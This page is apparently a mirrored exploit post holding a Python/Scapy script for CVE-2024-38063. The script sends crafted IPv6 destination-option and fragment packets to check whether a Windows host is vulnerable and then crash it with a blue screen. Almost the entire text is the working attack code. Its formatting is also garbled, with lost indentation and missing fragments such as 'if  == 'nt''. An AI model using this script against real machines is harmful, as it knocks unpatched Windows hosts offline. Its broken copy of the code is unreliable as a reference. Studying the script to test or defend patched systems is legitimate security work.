Windows TCP/IP – RCE Checker and Denial of Service

  • 作者: Photubias
    日期: 2024-08-28
  • 类别:
  • 来源:
  • #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
    # Date: 2024-08-07
    # Exploit Author: Photubias
    # Vendor Homepage:
    # Vendor Advisory: [1]
    # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
    # Tested on: Windows 11 23H2 and Windows Server 2022
    # CVE: CVE-2024-38063
    import os, subprocess, re, time, sys
    ## Variables
    sDstIP = 'fe80::78b7:6283:49ad:c565'## Placeholder
    if len(sys.argv) > 1: sDstIP = sys.argv[1]## Please provide an argument
    sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery
    iBatches = 20
    iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch
    print('--- Loading Scapy, might take some time ...')
    from scapy.config import conf
    conf.ipv6_enabled = False
    import scapy.all as scapy
    scapy.conf.verb = 0
    print('Error while loading scapy, please run "pip install scapy"')
    import logging
    def selectInterface(): #adapter[] = npfdevice, ip, mac
    def getAllInterfaces(): 
    if == 'nt':
    proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
    for bInterface in proc.stdout.readlines():
    lstInt = bInterface.split(b',')
    sAdapter = lstInt[0].strip(b'"').decode()
    sDevicename = lstInt[1].strip(b'"').decode()
    sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
    sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
    proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
    try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
    except: sIP = ''
    if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add
    proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
    for bInterface in proc.stdout.readlines():
    lstInt = bInterface.strip().split(b' ')
    if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
    except: pass
    return lstInterfaces
    lstInterfaces = getAllInterfaces()
    if len(lstInterfaces) > 1:
    i = 1
    for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID
    print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
    i += 1
    #sAnswer = input('[?] Please select the adapter [1]: ')
    else: sAnswer = None
    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1
    iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])
    def get_packets(iID, sDstIPv6, sDstMac=None):
    iFragID = 0xbedead00 + iID
    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'
    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)
    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
    oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
    oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
    oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
    return [oPacket1, oPacket2, oPacket3]
    def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation
    sMACResp = None
    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)
    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
    sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
    return sMACResp
    lstInt = selectInterface() ## NPF, IPv6, MAC, Name
    sMAC = doIPv6ND(sDstIP, lstInt[0])
    if sMAC: 
    print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
    sDstMAC = sMAC
    elif sDstMAC != '':
    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))
    print('[-] Without a MAC address, this exploit will probably not work')
    lstPacketsToSend = []
    for i in range(iBatches):
    for j in range(iCorruptions):
    lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)
    ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
    print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))
    ## Verification first: "ICMPv6ParamProblem"
    lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
    if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: 
    print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))
    input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')
    print('[i] Waiting 10 seconds to let the target cool down (more is better)')
    input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')
    ########## Exploit
    print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
    scapy.conf.verb = 1
    scapy.sendp(lstPacketsToSend, iface=lstInt[0])
    print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')